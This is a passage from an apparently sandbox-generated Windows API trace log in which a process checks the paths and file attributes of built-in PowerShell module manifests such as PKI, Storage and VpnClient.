ftCreationTime.dwLowDateTime=0x209484fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x209484fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x209484fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x34a)) returned 1 [0226.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1", lpFilePart=0x0) returned 0x3f [0226.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI\\PKI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki\\pki.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x764)) returned 1 [0226.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1", lpFilePart=0x0) returned 0x4b [0226.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x159bf51c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x159bf51c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x159bf51c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x329)) returned 1 [0226.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1", lpFilePart=0x0) returned 0x57 [0226.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement\\PrintManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement\\printmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2131e00c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2131e00c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2131e00c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x20ec)) returned 1 [0226.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1", lpFilePart=0x0) returned 0x6f [0226.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa88f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5fa88f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5fa88f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1198)) returned 1 [0226.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1", lpFilePart=0x0) returned 0x53 [0226.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.290] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f3c72, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a52)) returned 1 [0226.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1", lpFilePart=0x0) returned 0x53 [0226.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.290] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics\\PSDiagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics\\psdiagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6cda18, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x995ced79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x995ced79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44e)) returned 1 [0226.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1", lpFilePart=0x0) returned 0x55 [0226.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.290] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01a5ef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f01a5ef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f01a5ef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3be)) returned 1 [0226.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1", lpFilePart=0x0) returned 0x4d [0226.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow\\PSWorkflow.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow\\psworkflow.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a75f17, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x63a75f17, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x63a75f17, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0226.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1", lpFilePart=0x0) returned 0x5b [0226.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f22c8c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x62f22c8c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x62f22c8c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x316)) returned 1 [0226.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1", lpFilePart=0x0) returned 0x55 [0226.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ScheduledTasks\\ScheduledTasks.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\scheduledtasks\\scheduledtasks.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c4c87b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c4c87b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c4c87b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a)) returned 1 [0226.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1", lpFilePart=0x0) returned 0x4d [0226.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SecureBoot\\SecureBoot.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\secureboot\\secureboot.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0b9cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x15a0b9cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x15a0b9cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa)) returned 1 [0226.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1", lpFilePart=0x0) returned 0x49 [0226.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005)) returned 1 [0226.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1", lpFilePart=0x0) returned 0x4d [0226.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5)) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1", lpFilePart=0x0) returned 0x4f [0226.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec)) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1", lpFilePart=0x0) returned 0x47 [0226.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937)) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", lpFilePart=0x0) returned 0x3f [0226.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28c)) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0226.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x208fc045, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x208fc045, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x208fc045, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44a)) returned 1 [0226.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", lpFilePart=0x0) returned 0x63 [0226.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1420df86, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1420df86, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1420df86, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27b)) returned 1 [0226.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", lpFilePart=0x0) returned 0x4b [0226.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6c5cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb6c5cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb6c5cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x611)) returned 1 [0226.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", lpFilePart=0x0) returned 0x41 [0226.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192ab6aa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x192ab6aa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x192ab6aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0)) returned 1 [0226.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", lpFilePart=0x0) returned 0x67 [0226.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.293] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x235)) returned 1 [0226.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: 